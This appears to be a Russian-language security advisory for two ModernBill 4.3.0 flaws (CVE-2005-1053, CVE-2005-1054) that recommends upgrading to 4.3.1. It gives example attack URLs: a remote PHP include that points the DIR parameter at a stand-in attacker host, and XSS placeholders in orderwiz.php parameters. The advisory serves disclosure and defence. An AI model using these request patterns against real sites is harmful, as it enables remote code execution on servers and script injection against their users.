PHP-инклюдинг и межсайтовый в скриптинг в ModernBill

Дата публикации:
12.04.2005
Дата изменения:
10.11.2008
Всего просмотров:
2625
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2005-1053
CVE-2005-1054
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
ModernBill 4.x
Уязвимые версии: ModernBill 4.3.0 и более ранние версии

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные команды на целевой системе и произвести XSS нападение.

1. Уязвимость существует из-за недостаточной фильтрации входных данных в параметре DIR сценария 'include/functions.inc.php'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе с привилегия web сервера. Пример:

http://[target]/samples/news.php?DIR=http://[attacker]/

2. Уязвимость существует из-за недостаточной фильтрации входных данных в параметрах 'aid' и 'c_code' сценария 'orderwiz.php'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

http://[target]/order/orderwiz.php?v=1
&aid=&c_code=[XSS]

http://[target]/order/orderwiz.php?v=1
&aid=[XSS]

URL производителя: www.modernbill.com

Решение: Установите последнюю версию(4.3.1) от производителя.

Ссылки: ModernBill Include File Error in Sample 'news.php' Script Lets Remote Users Execute Commands and Input Validation Holes in 'orderwiz.php' Permit Cross-Site Scripting Attacks

или введите имя

CAPTCHA